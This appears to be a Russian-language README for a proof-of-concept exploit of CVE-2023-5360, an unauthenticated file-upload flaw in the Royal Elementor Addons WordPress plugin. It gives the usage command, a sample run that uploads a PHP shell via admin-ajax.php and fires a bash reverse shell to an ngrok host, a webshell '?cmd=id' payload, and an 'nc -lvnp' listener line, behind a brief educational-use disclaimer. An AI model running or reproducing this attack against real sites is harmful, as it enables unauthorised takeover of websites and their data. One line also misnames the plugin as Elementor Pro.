
Royal Elementor Addons — неаутентифицированное удалённое выполнение кода
Плагин Royal Elementor Addons and Templates для WordPress до версии 1.3.79 не выполняет должную проверку загружаемых файлов, что может позволить неавторизованным пользователям загружать произвольные файлы, например PHP, и добиваться удалённого выполнения кода (RCE).
_______ ________
/ ____/ | / / ____/
/ / | | / / __/______
/ /___ | |/ /__/_____/
\____/ |___/_____/_____
|__ \ / __ \__ \|__ /
__/ // / / /_/ / /_ <
/ __// /_/ / __/___/ /
/____/\____/____/____/____
/ ____/__ // ___// __ \
/___ \ /_ </ __ \/ / / /
____/ /___/ / /_/ / /_/ /
/_____//____/\____/\____/
by X3RX3S
Это proof-of-concept эксплойт для CVE-2023-5360, уязвимости загрузки файлов в Elementor Pro для WordPress. Он позволяет неавторизованному злоумышленнику загружать произвольные PHP-файлы и получать удалённое выполнение кода.
python3 CVE-2023-5360.py <https://victim.site/>
Пример:
python3 CVE-2023-5360.py https://victim.site/
_______ ________
/ ____/ | / / ____/
/ / | | / / __/______
/ /___ | |/ /__/_____/
\____/ |___/_____/_____
|__ \ / __ \__ \|__ /
__/ // / / /_/ / /_ <
/ __// /_/ / __/___/ /
/____/\____/____/____/____
/ ____/__ // ___// __ \
/___ \ /_ </ __ \/ / / /
____/ /___/ / /_/ / /_/ /
/_____//____/\____/\____/
github.com/X3RX3SSec
by X3RX3S aka @mindfuckerrrr
[+] Target: https://victim.site
[+] Elementor page: https://victim.site)
[*] Step 1: Grabbing Elementor nonce...
[+] HTTP 200 received from target
[+] Nonce extracted: fdcb5015cd
[*] Step 2: Configure payload
[1] Simple command webshell
[2] Reverse shell (bash)
[?] Choose payload [1/2]: 2
[?] LHOST (your IP): 7.tcp.eu.ngrok.io
[?] LPORT (your PORT): 31337
[+] Reverse shell payload generated for 7.tcp.eu.ngrok.io:31337
[?] Start built-in listener? [Y/n]: Y
[+] Starting local listener on 7.tcp.eu.ngrok.io:31337...
[*] Attempt 1 of 3: Uploading payload via AJAX exploit...
[>] POST https://victim.site/wp-admin/admin-ajax.php
listening on [any] 31337 ...
[+] HTTP 200 from upload handler
[+] Shell uploaded: https://victim.site/wp-content/uploads/wpr-addons/forms/shell-6253.php
[*] Triggering reverse shell. Have your listener ready!
[+] Trigger sent (timeout is normal for reverse shell).
[+] Arrr! Cannons fired. Check your listener! 🏴☠️💣
Варианты полезной нагрузки:
?cmd=id, например: https://victim.site/wp-content/uploads/wpr-addons/forms/shell.php?cmd=id)requestsУстановка зависимостей:
pip install requests
nc -lvnp 1337
Этот эксплойт предназначен только для образовательных целей и авторизованного тестирования безопасности. Вы несёте ответственность за то, как вы его используете. Тестируйте только на системах, которые принадлежат вам или на тестирование которых у вас есть разрешение.
Автор: X3RX3S CVE-2023-5360